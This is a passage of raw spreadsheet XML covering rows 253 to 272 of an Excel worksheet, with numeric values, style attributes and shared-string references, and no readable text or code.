        <v>1.0</v>
      </c>
      <c r="C253" s="29">
        <v>26344.0</v>
      </c>
      <c r="D253" s="14"/>
      <c r="E253" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F253" s="14"/>
      <c r="G253" s="29">
        <v>35.0</v>
      </c>
      <c r="H253" s="29">
        <v>1710.0</v>
      </c>
      <c r="I253" s="29">
        <v>5248.0</v>
      </c>
      <c r="J253" s="15"/>
      <c r="K253" s="29">
        <v>396.0</v>
      </c>
      <c r="L253" s="15"/>
      <c r="M253" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N253" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O253" s="29">
        <v>2.0</v>
      </c>
      <c r="P253" s="29">
        <v>1.0</v>
      </c>
      <c r="Q253" s="15"/>
      <c r="R253" s="15"/>
      <c r="S253" s="15"/>
      <c r="T253" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U253" s="5"/>
      <c r="V253" s="5"/>
      <c r="W253" s="47"/>
      <c r="X253" s="45"/>
      <c r="Y253" s="45"/>
      <c r="Z253" s="38" t="s">
        <v>1856</v>
      </c>
      <c r="AA253" s="39" t="s">
        <v>1857</v>
      </c>
      <c r="AB253" s="38" t="s">
        <v>1672</v>
      </c>
      <c r="AC253" s="40">
        <v>26332.0</v>
      </c>
      <c r="AD253" s="5"/>
      <c r="AE253" s="14"/>
      <c r="AF253" s="14"/>
    </row>
    <row r="254">
      <c r="A254" s="6">
        <f t="shared" si="1"/>
        <v>0.4457715901</v>
      </c>
      <c r="B254" s="29">
        <v>1.0</v>
      </c>
      <c r="C254" s="15"/>
      <c r="D254" s="14"/>
      <c r="E254" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F254" s="14"/>
      <c r="G254" s="29">
        <v>3.0</v>
      </c>
      <c r="H254" s="29">
        <v>512.0</v>
      </c>
      <c r="I254" s="29">
        <v>174100.0</v>
      </c>
      <c r="J254" s="15"/>
      <c r="K254" s="29">
        <v>174100.0</v>
      </c>
      <c r="L254" s="15"/>
      <c r="M254" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N254" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O254" s="29">
        <v>0.0</v>
      </c>
      <c r="P254" s="29">
        <v>5.0</v>
      </c>
      <c r="Q254" s="15"/>
      <c r="R254" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S254" s="15"/>
      <c r="T254" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U254" s="5"/>
      <c r="V254" s="5"/>
      <c r="W254" s="47"/>
      <c r="X254" s="45"/>
      <c r="Y254" s="45"/>
      <c r="Z254" s="38" t="s">
        <v>1858</v>
      </c>
      <c r="AA254" s="39" t="s">
        <v>1859</v>
      </c>
      <c r="AB254" s="38" t="s">
        <v>1860</v>
      </c>
      <c r="AC254" s="40">
        <v>182417.0</v>
      </c>
      <c r="AD254" s="5"/>
      <c r="AE254" s="14"/>
      <c r="AF254" s="14"/>
    </row>
    <row r="255">
      <c r="A255" s="6">
        <f t="shared" si="1"/>
        <v>0.6623840857</v>
      </c>
      <c r="B255" s="29">
        <v>1.0</v>
      </c>
      <c r="C255" s="14"/>
      <c r="D255" s="14"/>
      <c r="E255" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F255" s="14"/>
      <c r="G255" s="29">
        <v>0.0</v>
      </c>
      <c r="H255" s="29">
        <v>185.0</v>
      </c>
      <c r="I255" s="29">
        <v>197350.0</v>
      </c>
      <c r="J255" s="15"/>
      <c r="K255" s="29">
        <v>197350.0</v>
      </c>
      <c r="L255" s="15"/>
      <c r="M255" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N255" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O255" s="29">
        <v>1.0</v>
      </c>
      <c r="P255" s="29">
        <v>0.0</v>
      </c>
      <c r="Q255" s="15"/>
      <c r="R255" s="15"/>
      <c r="S255" s="15"/>
      <c r="T255" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U255" s="5"/>
      <c r="V255" s="5"/>
      <c r="W255" s="47"/>
      <c r="X255" s="45"/>
      <c r="Y255" s="45"/>
      <c r="Z255" s="38" t="s">
        <v>1861</v>
      </c>
      <c r="AA255" s="39" t="s">
        <v>1862</v>
      </c>
      <c r="AB255" s="38" t="s">
        <v>1863</v>
      </c>
      <c r="AC255" s="40">
        <v>201844.0</v>
      </c>
      <c r="AD255" s="5"/>
      <c r="AE255" s="14"/>
      <c r="AF255" s="14"/>
    </row>
    <row r="256">
      <c r="A256" s="6">
        <f t="shared" si="1"/>
        <v>0.4972895437</v>
      </c>
      <c r="B256" s="29">
        <v>1.0</v>
      </c>
      <c r="C256" s="15"/>
      <c r="D256" s="14"/>
      <c r="E256" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F256" s="14"/>
      <c r="G256" s="29">
        <v>0.0</v>
      </c>
      <c r="H256" s="29">
        <v>214.0</v>
      </c>
      <c r="I256" s="29">
        <v>24176.0</v>
      </c>
      <c r="J256" s="15"/>
      <c r="K256" s="29">
        <v>-1.0</v>
      </c>
      <c r="L256" s="15"/>
      <c r="M256" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N256" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O256" s="29">
        <v>0.0</v>
      </c>
      <c r="P256" s="29">
        <v>5.0</v>
      </c>
      <c r="Q256" s="15"/>
      <c r="R256" s="15"/>
      <c r="S256" s="15"/>
      <c r="T256" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U256" s="5"/>
      <c r="V256" s="5"/>
      <c r="W256" s="47"/>
      <c r="X256" s="45"/>
      <c r="Y256" s="45"/>
      <c r="Z256" s="38" t="s">
        <v>1864</v>
      </c>
      <c r="AA256" s="39" t="s">
        <v>1865</v>
      </c>
      <c r="AB256" s="38" t="s">
        <v>1866</v>
      </c>
      <c r="AC256" s="40">
        <v>145154.0</v>
      </c>
      <c r="AD256" s="5"/>
      <c r="AE256" s="14"/>
      <c r="AF256" s="14"/>
    </row>
    <row r="257">
      <c r="A257" s="6">
        <f t="shared" si="1"/>
        <v>0.339162343</v>
      </c>
      <c r="B257" s="29">
        <v>1.0</v>
      </c>
      <c r="C257" s="29">
        <v>9381.0</v>
      </c>
      <c r="D257" s="14"/>
      <c r="E257" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F257" s="14"/>
      <c r="G257" s="29">
        <v>31.0</v>
      </c>
      <c r="H257" s="29">
        <v>3464.0</v>
      </c>
      <c r="I257" s="29">
        <v>1451.0</v>
      </c>
      <c r="J257" s="15"/>
      <c r="K257" s="15"/>
      <c r="L257" s="15"/>
      <c r="M257" s="15"/>
      <c r="N257" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O257" s="29">
        <v>5.0</v>
      </c>
      <c r="P257" s="29">
        <v>4.0</v>
      </c>
      <c r="Q257" s="15"/>
      <c r="R257" s="15"/>
      <c r="S257" s="15"/>
      <c r="T257" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U257" s="5"/>
      <c r="V257" s="5"/>
      <c r="W257" s="47"/>
      <c r="X257" s="45"/>
      <c r="Y257" s="45"/>
      <c r="Z257" s="38" t="s">
        <v>1867</v>
      </c>
      <c r="AA257" s="39" t="s">
        <v>1868</v>
      </c>
      <c r="AB257" s="38" t="s">
        <v>1629</v>
      </c>
      <c r="AC257" s="40">
        <v>9336.0</v>
      </c>
      <c r="AD257" s="5"/>
      <c r="AE257" s="14"/>
      <c r="AF257" s="14"/>
    </row>
    <row r="258">
      <c r="A258" s="6">
        <f t="shared" si="1"/>
        <v>0.7089223293</v>
      </c>
      <c r="B258" s="29">
        <v>1.0</v>
      </c>
      <c r="C258" s="14"/>
      <c r="D258" s="14"/>
      <c r="E258" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F258" s="14"/>
      <c r="G258" s="29">
        <v>1.0</v>
      </c>
      <c r="H258" s="29">
        <v>5449.0</v>
      </c>
      <c r="I258" s="29">
        <v>179277.0</v>
      </c>
      <c r="J258" s="15"/>
      <c r="K258" s="29">
        <v>98538.0</v>
      </c>
      <c r="L258" s="15"/>
      <c r="M258" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N258" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O258" s="29">
        <v>2.0</v>
      </c>
      <c r="P258" s="29">
        <v>1.0</v>
      </c>
      <c r="Q258" s="15"/>
      <c r="R258" s="15"/>
      <c r="S258" s="15"/>
      <c r="T258" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U258" s="5"/>
      <c r="V258" s="5"/>
      <c r="W258" s="47"/>
      <c r="X258" s="45"/>
      <c r="Y258" s="45"/>
      <c r="Z258" s="38" t="s">
        <v>1869</v>
      </c>
      <c r="AA258" s="39" t="s">
        <v>1870</v>
      </c>
      <c r="AB258" s="38" t="s">
        <v>1871</v>
      </c>
      <c r="AC258" s="40">
        <v>186826.0</v>
      </c>
      <c r="AD258" s="5"/>
      <c r="AE258" s="14"/>
      <c r="AF258" s="14"/>
    </row>
    <row r="259">
      <c r="A259" s="6">
        <f t="shared" si="1"/>
        <v>0.4932517729</v>
      </c>
      <c r="B259" s="29">
        <v>1.0</v>
      </c>
      <c r="C259" s="29">
        <v>90457.0</v>
      </c>
      <c r="D259" s="14"/>
      <c r="E259" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F259" s="14"/>
      <c r="G259" s="29">
        <v>5.0</v>
      </c>
      <c r="H259" s="29">
        <v>580.0</v>
      </c>
      <c r="I259" s="29">
        <v>8340.0</v>
      </c>
      <c r="J259" s="15"/>
      <c r="K259" s="29">
        <v>-1.0</v>
      </c>
      <c r="L259" s="15"/>
      <c r="M259" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N259" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O259" s="29">
        <v>1.0</v>
      </c>
      <c r="P259" s="29">
        <v>0.0</v>
      </c>
      <c r="Q259" s="15"/>
      <c r="R259" s="15"/>
      <c r="S259" s="15"/>
      <c r="T259" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U259" s="5"/>
      <c r="V259" s="5"/>
      <c r="W259" s="47"/>
      <c r="X259" s="45"/>
      <c r="Y259" s="45"/>
      <c r="Z259" s="38" t="s">
        <v>1872</v>
      </c>
      <c r="AA259" s="39" t="s">
        <v>1873</v>
      </c>
      <c r="AB259" s="38" t="s">
        <v>1874</v>
      </c>
      <c r="AC259" s="40">
        <v>90377.0</v>
      </c>
      <c r="AD259" s="5"/>
      <c r="AE259" s="14"/>
      <c r="AF259" s="14"/>
    </row>
    <row r="260">
      <c r="A260" s="6">
        <f t="shared" si="1"/>
        <v>0.4054232022</v>
      </c>
      <c r="B260" s="29">
        <v>1.0</v>
      </c>
      <c r="C260" s="14"/>
      <c r="D260" s="14"/>
      <c r="E260" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F260" s="14"/>
      <c r="G260" s="29">
        <v>1.0</v>
      </c>
      <c r="H260" s="29">
        <v>341.0</v>
      </c>
      <c r="I260" s="29">
        <v>81893.0</v>
      </c>
      <c r="J260" s="15"/>
      <c r="K260" s="15"/>
      <c r="L260" s="15"/>
      <c r="M260" s="15"/>
      <c r="N260" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O260" s="29">
        <v>0.0</v>
      </c>
      <c r="P260" s="29">
        <v>0.0</v>
      </c>
      <c r="Q260" s="15"/>
      <c r="R260" s="15"/>
      <c r="S260" s="15"/>
      <c r="T260" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U260" s="5"/>
      <c r="V260" s="5"/>
      <c r="W260" s="47"/>
      <c r="X260" s="45"/>
      <c r="Y260" s="45"/>
      <c r="Z260" s="38" t="s">
        <v>1875</v>
      </c>
      <c r="AA260" s="39" t="s">
        <v>1876</v>
      </c>
      <c r="AB260" s="38" t="s">
        <v>1877</v>
      </c>
      <c r="AC260" s="40">
        <v>219981.0</v>
      </c>
      <c r="AD260" s="5"/>
      <c r="AE260" s="14"/>
      <c r="AF260" s="14"/>
    </row>
    <row r="261">
      <c r="A261" s="6">
        <f t="shared" si="1"/>
        <v>0.489707421</v>
      </c>
      <c r="B261" s="29">
        <v>1.0</v>
      </c>
      <c r="C261" s="15"/>
      <c r="D261" s="14"/>
      <c r="E261" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F261" s="14"/>
      <c r="G261" s="29">
        <v>6.0</v>
      </c>
      <c r="H261" s="29">
        <v>866.0</v>
      </c>
      <c r="I261" s="29">
        <v>103181.0</v>
      </c>
      <c r="J261" s="15"/>
      <c r="K261" s="29">
        <v>103181.0</v>
      </c>
      <c r="L261" s="15"/>
      <c r="M261" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N261" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O261" s="29">
        <v>3.0</v>
      </c>
      <c r="P261" s="29">
        <v>1.0</v>
      </c>
      <c r="Q261" s="15"/>
      <c r="R261" s="15"/>
      <c r="S261" s="15"/>
      <c r="T261" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U261" s="5"/>
      <c r="V261" s="5"/>
      <c r="W261" s="47"/>
      <c r="X261" s="45"/>
      <c r="Y261" s="45"/>
      <c r="Z261" s="38" t="s">
        <v>1878</v>
      </c>
      <c r="AA261" s="39" t="s">
        <v>1879</v>
      </c>
      <c r="AB261" s="38" t="s">
        <v>1880</v>
      </c>
      <c r="AC261" s="40">
        <v>257207.0</v>
      </c>
      <c r="AD261" s="5"/>
      <c r="AE261" s="14"/>
      <c r="AF261" s="14"/>
    </row>
    <row r="262">
      <c r="A262" s="6">
        <f t="shared" si="1"/>
        <v>0.7407057897</v>
      </c>
      <c r="B262" s="29">
        <v>1.0</v>
      </c>
      <c r="C262" s="15"/>
      <c r="D262" s="14"/>
      <c r="E262" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F262" s="14"/>
      <c r="G262" s="29">
        <v>1.0</v>
      </c>
      <c r="H262" s="29">
        <v>131.0</v>
      </c>
      <c r="I262" s="29">
        <v>147141.0</v>
      </c>
      <c r="J262" s="15"/>
      <c r="K262" s="29">
        <v>147141.0</v>
      </c>
      <c r="L262" s="15"/>
      <c r="M262" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N262" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O262" s="29">
        <v>0.0</v>
      </c>
      <c r="P262" s="29">
        <v>7.0</v>
      </c>
      <c r="Q262" s="15"/>
      <c r="R262" s="15"/>
      <c r="S262" s="15"/>
      <c r="T262" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U262" s="5"/>
      <c r="V262" s="5"/>
      <c r="W262" s="47"/>
      <c r="X262" s="45"/>
      <c r="Y262" s="45"/>
      <c r="Z262" s="38" t="s">
        <v>1881</v>
      </c>
      <c r="AA262" s="39" t="s">
        <v>1882</v>
      </c>
      <c r="AB262" s="38" t="s">
        <v>1883</v>
      </c>
      <c r="AC262" s="40">
        <v>158527.0</v>
      </c>
      <c r="AD262" s="5"/>
      <c r="AE262" s="14"/>
      <c r="AF262" s="14"/>
    </row>
    <row r="263">
      <c r="A263" s="6">
        <f t="shared" si="1"/>
        <v>0.02850975281</v>
      </c>
      <c r="B263" s="29">
        <v>1.0</v>
      </c>
      <c r="C263" s="29">
        <v>14805.0</v>
      </c>
      <c r="D263" s="14"/>
      <c r="E263" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F263" s="14"/>
      <c r="G263" s="29">
        <v>19.0</v>
      </c>
      <c r="H263" s="29">
        <v>10176.0</v>
      </c>
      <c r="I263" s="29">
        <v>2221.0</v>
      </c>
      <c r="J263" s="15"/>
      <c r="K263" s="29">
        <v>-1.0</v>
      </c>
      <c r="L263" s="15"/>
      <c r="M263" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N263" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O263" s="29">
        <v>4.0</v>
      </c>
      <c r="P263" s="29">
        <v>0.0</v>
      </c>
      <c r="Q263" s="15"/>
      <c r="R263" s="15"/>
      <c r="S263" s="15"/>
      <c r="T263" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U263" s="5"/>
      <c r="V263" s="5"/>
      <c r="W263" s="47"/>
      <c r="X263" s="45"/>
      <c r="Y263" s="45"/>
      <c r="Z263" s="38" t="s">
        <v>1884</v>
      </c>
      <c r="AA263" s="39" t="s">
        <v>1885</v>
      </c>
      <c r="AB263" s="38" t="s">
        <v>1886</v>
      </c>
      <c r="AC263" s="40">
        <v>14802.0</v>
      </c>
      <c r="AD263" s="5"/>
      <c r="AE263" s="14"/>
      <c r="AF263" s="14"/>
    </row>
    <row r="264">
      <c r="A264" s="6">
        <f t="shared" si="1"/>
        <v>0.2386121972</v>
      </c>
      <c r="B264" s="29">
        <v>1.0</v>
      </c>
      <c r="C264" s="29">
        <v>209782.0</v>
      </c>
      <c r="D264" s="14"/>
      <c r="E264" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F264" s="14"/>
      <c r="G264" s="29">
        <v>2.0</v>
      </c>
      <c r="H264" s="29">
        <v>62999.0</v>
      </c>
      <c r="I264" s="29">
        <v>207478.0</v>
      </c>
      <c r="J264" s="15"/>
      <c r="K264" s="29">
        <v>207478.0</v>
      </c>
      <c r="L264" s="15"/>
      <c r="M264" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N264" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O264" s="29">
        <v>1.0</v>
      </c>
      <c r="P264" s="29">
        <v>4.0</v>
      </c>
      <c r="Q264" s="15"/>
      <c r="R264" s="15"/>
      <c r="S264" s="15"/>
      <c r="T264" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U264" s="5"/>
      <c r="V264" s="5"/>
      <c r="W264" s="47"/>
      <c r="X264" s="45"/>
      <c r="Y264" s="45"/>
      <c r="Z264" s="38" t="s">
        <v>1887</v>
      </c>
      <c r="AA264" s="39" t="s">
        <v>1888</v>
      </c>
      <c r="AB264" s="38" t="s">
        <v>1889</v>
      </c>
      <c r="AC264" s="40">
        <v>209769.0</v>
      </c>
      <c r="AD264" s="5"/>
      <c r="AE264" s="14"/>
      <c r="AF264" s="14"/>
    </row>
    <row r="265">
      <c r="A265" s="6">
        <f t="shared" si="1"/>
        <v>0.9066144151</v>
      </c>
      <c r="B265" s="29">
        <v>1.0</v>
      </c>
      <c r="C265" s="15"/>
      <c r="D265" s="14"/>
      <c r="E265" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F265" s="14"/>
      <c r="G265" s="29">
        <v>12.0</v>
      </c>
      <c r="H265" s="29">
        <v>940.0</v>
      </c>
      <c r="I265" s="29">
        <v>396.0</v>
      </c>
      <c r="J265" s="15"/>
      <c r="K265" s="29">
        <v>-1.0</v>
      </c>
      <c r="L265" s="15"/>
      <c r="M265" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N265" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O265" s="29">
        <v>3.0</v>
      </c>
      <c r="P265" s="29">
        <v>2.0</v>
      </c>
      <c r="Q265" s="15"/>
      <c r="R265" s="15"/>
      <c r="S265" s="15"/>
      <c r="T265" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U265" s="5"/>
      <c r="V265" s="5"/>
      <c r="W265" s="47"/>
      <c r="X265" s="45"/>
      <c r="Y265" s="45"/>
      <c r="Z265" s="38" t="s">
        <v>1890</v>
      </c>
      <c r="AA265" s="39" t="s">
        <v>1891</v>
      </c>
      <c r="AB265" s="38" t="s">
        <v>1892</v>
      </c>
      <c r="AC265" s="40">
        <v>31867.0</v>
      </c>
      <c r="AD265" s="5"/>
      <c r="AE265" s="14"/>
      <c r="AF265" s="14"/>
    </row>
    <row r="266">
      <c r="A266" s="6">
        <f t="shared" si="1"/>
        <v>0.2543924028</v>
      </c>
      <c r="B266" s="29">
        <v>1.0</v>
      </c>
      <c r="C266" s="29">
        <v>176283.0</v>
      </c>
      <c r="D266" s="14"/>
      <c r="E266" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F266" s="14"/>
      <c r="G266" s="29">
        <v>2.0</v>
      </c>
      <c r="H266" s="29">
        <v>4370.0</v>
      </c>
      <c r="I266" s="29">
        <v>160683.0</v>
      </c>
      <c r="J266" s="15"/>
      <c r="K266" s="29">
        <v>6253.0</v>
      </c>
      <c r="L266" s="15"/>
      <c r="M266" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N266" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O266" s="29">
        <v>1.0</v>
      </c>
      <c r="P266" s="29">
        <v>10.0</v>
      </c>
      <c r="Q266" s="15"/>
      <c r="R266" s="15"/>
      <c r="S266" s="15"/>
      <c r="T266" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U266" s="5"/>
      <c r="V266" s="5"/>
      <c r="W266" s="47"/>
      <c r="X266" s="45"/>
      <c r="Y266" s="45"/>
      <c r="Z266" s="38" t="s">
        <v>1893</v>
      </c>
      <c r="AA266" s="39" t="s">
        <v>1894</v>
      </c>
      <c r="AB266" s="38" t="s">
        <v>1895</v>
      </c>
      <c r="AC266" s="40">
        <v>176249.0</v>
      </c>
      <c r="AD266" s="5"/>
      <c r="AE266" s="14"/>
      <c r="AF266" s="14"/>
    </row>
    <row r="267">
      <c r="A267" s="6">
        <f t="shared" si="1"/>
        <v>0.8196671584</v>
      </c>
      <c r="B267" s="29">
        <v>1.0</v>
      </c>
      <c r="C267" s="15"/>
      <c r="D267" s="14"/>
      <c r="E267" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F267" s="14"/>
      <c r="G267" s="29">
        <v>5.0</v>
      </c>
      <c r="H267" s="29">
        <v>384.0</v>
      </c>
      <c r="I267" s="29">
        <v>110455.0</v>
      </c>
      <c r="J267" s="15"/>
      <c r="K267" s="29">
        <v>8340.0</v>
      </c>
      <c r="L267" s="15"/>
      <c r="M267" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N267" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O267" s="29">
        <v>2.0</v>
      </c>
      <c r="P267" s="29">
        <v>3.0</v>
      </c>
      <c r="Q267" s="15"/>
      <c r="R267" s="15"/>
      <c r="S267" s="15"/>
      <c r="T267" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U267" s="5"/>
      <c r="V267" s="5"/>
      <c r="W267" s="47"/>
      <c r="X267" s="45"/>
      <c r="Y267" s="45"/>
      <c r="Z267" s="38" t="s">
        <v>1896</v>
      </c>
      <c r="AA267" s="39" t="s">
        <v>1897</v>
      </c>
      <c r="AB267" s="38" t="s">
        <v>1898</v>
      </c>
      <c r="AC267" s="40">
        <v>123892.0</v>
      </c>
      <c r="AD267" s="5"/>
      <c r="AE267" s="14"/>
      <c r="AF267" s="14"/>
    </row>
    <row r="268">
      <c r="A268" s="6">
        <f t="shared" si="1"/>
        <v>0.239061333</v>
      </c>
      <c r="B268" s="29">
        <v>1.0</v>
      </c>
      <c r="C268" s="29">
        <v>233860.0</v>
      </c>
      <c r="D268" s="14"/>
      <c r="E268" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F268" s="14"/>
      <c r="G268" s="29">
        <v>0.0</v>
      </c>
      <c r="H268" s="29">
        <v>799.0</v>
      </c>
      <c r="I268" s="29">
        <v>169188.0</v>
      </c>
      <c r="J268" s="15"/>
      <c r="K268" s="15"/>
      <c r="L268" s="15"/>
      <c r="M268" s="15"/>
      <c r="N268" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O268" s="29">
        <v>2.0</v>
      </c>
      <c r="P268" s="29">
        <v>6.0</v>
      </c>
      <c r="Q268" s="15"/>
      <c r="R268" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S268" s="15"/>
      <c r="T268" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U268" s="5"/>
      <c r="V268" s="5"/>
      <c r="W268" s="47"/>
      <c r="X268" s="45"/>
      <c r="Y268" s="45"/>
      <c r="Z268" s="38" t="s">
        <v>1899</v>
      </c>
      <c r="AA268" s="39" t="s">
        <v>1900</v>
      </c>
      <c r="AB268" s="38" t="s">
        <v>1901</v>
      </c>
      <c r="AC268" s="40">
        <v>233815.0</v>
      </c>
      <c r="AD268" s="5"/>
      <c r="AE268" s="14"/>
      <c r="AF268" s="14"/>
    </row>
    <row r="269">
      <c r="A269" s="6">
        <f t="shared" si="1"/>
        <v>0.6761673029</v>
      </c>
      <c r="B269" s="29">
        <v>1.0</v>
      </c>
      <c r="C269" s="15"/>
      <c r="D269" s="14"/>
      <c r="E269" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F269" s="14"/>
      <c r="G269" s="29">
        <v>0.0</v>
      </c>
      <c r="H269" s="29">
        <v>173.0</v>
      </c>
      <c r="I269" s="29">
        <v>184903.0</v>
      </c>
      <c r="J269" s="15"/>
      <c r="K269" s="29">
        <v>139477.0</v>
      </c>
      <c r="L269" s="15"/>
      <c r="M269" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N269" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O269" s="29">
        <v>2.0</v>
      </c>
      <c r="P269" s="29">
        <v>2.0</v>
      </c>
      <c r="Q269" s="15"/>
      <c r="R269" s="15"/>
      <c r="S269" s="15"/>
      <c r="T269" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U269" s="5"/>
      <c r="V269" s="5"/>
      <c r="W269" s="47"/>
      <c r="X269" s="45"/>
      <c r="Y269" s="45"/>
      <c r="Z269" s="38" t="s">
        <v>1902</v>
      </c>
      <c r="AA269" s="39" t="s">
        <v>1903</v>
      </c>
      <c r="AB269" s="38" t="s">
        <v>1904</v>
      </c>
      <c r="AC269" s="40">
        <v>192225.0</v>
      </c>
      <c r="AD269" s="5"/>
      <c r="AE269" s="14"/>
      <c r="AF269" s="14"/>
    </row>
    <row r="270">
      <c r="A270" s="6">
        <f t="shared" si="1"/>
        <v>0.271658484</v>
      </c>
      <c r="B270" s="29">
        <v>1.0</v>
      </c>
      <c r="C270" s="29">
        <v>192098.0</v>
      </c>
      <c r="D270" s="14"/>
      <c r="E270" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F270" s="14"/>
      <c r="G270" s="29">
        <v>1.0</v>
      </c>
      <c r="H270" s="29">
        <v>764.0</v>
      </c>
      <c r="I270" s="29">
        <v>184817.0</v>
      </c>
      <c r="J270" s="15"/>
      <c r="K270" s="15"/>
      <c r="L270" s="15"/>
      <c r="M270" s="15"/>
      <c r="N270" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O270" s="29">
        <v>1.0</v>
      </c>
      <c r="P270" s="29">
        <v>0.0</v>
      </c>
      <c r="Q270" s="15"/>
      <c r="R270" s="15"/>
      <c r="S270" s="15"/>
      <c r="T270" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U270" s="5"/>
      <c r="V270" s="5"/>
      <c r="W270" s="47"/>
      <c r="X270" s="45"/>
      <c r="Y270" s="45"/>
      <c r="Z270" s="38" t="s">
        <v>1905</v>
      </c>
      <c r="AA270" s="39" t="s">
        <v>1906</v>
      </c>
      <c r="AB270" s="38" t="s">
        <v>1907</v>
      </c>
      <c r="AC270" s="40">
        <v>192089.0</v>
      </c>
      <c r="AD270" s="5"/>
      <c r="AE270" s="14"/>
      <c r="AF270" s="14"/>
    </row>
    <row r="271">
      <c r="A271" s="6">
        <f t="shared" si="1"/>
        <v>0.2162011758</v>
      </c>
      <c r="B271" s="29">
        <v>1.0</v>
      </c>
      <c r="C271" s="14"/>
      <c r="D271" s="14"/>
      <c r="E271" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F271" s="14"/>
      <c r="G271" s="29">
        <v>0.0</v>
      </c>
      <c r="H271" s="29">
        <v>278.0</v>
      </c>
      <c r="I271" s="29">
        <v>269960.0</v>
      </c>
      <c r="J271" s="15"/>
      <c r="K271" s="29">
        <v>6253.0</v>
      </c>
      <c r="L271" s="15"/>
      <c r="M271" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N271" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O271" s="29">
        <v>0.0</v>
      </c>
      <c r="P271" s="29">
        <v>3.0</v>
      </c>
      <c r="Q271" s="15"/>
      <c r="R271" s="15"/>
      <c r="S271" s="15"/>
      <c r="T271" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U271" s="5"/>
      <c r="V271" s="5"/>
      <c r="W271" s="47"/>
      <c r="X271" s="45"/>
      <c r="Y271" s="45"/>
      <c r="Z271" s="38" t="s">
        <v>1908</v>
      </c>
      <c r="AA271" s="39" t="s">
        <v>1909</v>
      </c>
      <c r="AB271" s="38" t="s">
        <v>1910</v>
      </c>
      <c r="AC271" s="40">
        <v>257031.0</v>
      </c>
      <c r="AD271" s="5"/>
      <c r="AE271" s="14"/>
      <c r="AF271" s="14"/>
    </row>
    <row r="272">
      <c r="A272" s="6">
        <f t="shared" si="1"/>
        <v>0.36487539</v>
      </c>
      <c r="B272" s="29">
        <v>1.0</v>
      </c>
      <c r="C272" s="15"/>
      <c r="D272" s="14"/>
      <c r="E272" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F272" s="14"/>
      <c r="G272" s="29">
        <v>1.0</v>
      </c>
      <c r="H272" s="29">
        <v>291.0</v>
      </c>
      <c r="I272" s="29">
        <v>7878.0</v>
      </c>
      <c r="J272" s="15"/>
      <c r="K272" s="29">
        <v>7878.0</v>
      </c>
      <c r="L272" s="15"/>
      <c r="M272" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N272" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O272" s="29">
        <v>0.0</v>
      </c>
      <c r="P272" s="29">
        <v>3.0</v>
      </c>
      <c r="Q272" s="29">
        <v>0.0</v>
      </c>
      <c r="R272" s="15"/>
      <c r="S272" s="15"/>
      <c r="T272" s="5" t="s">
        <v>37</v>
      </c>
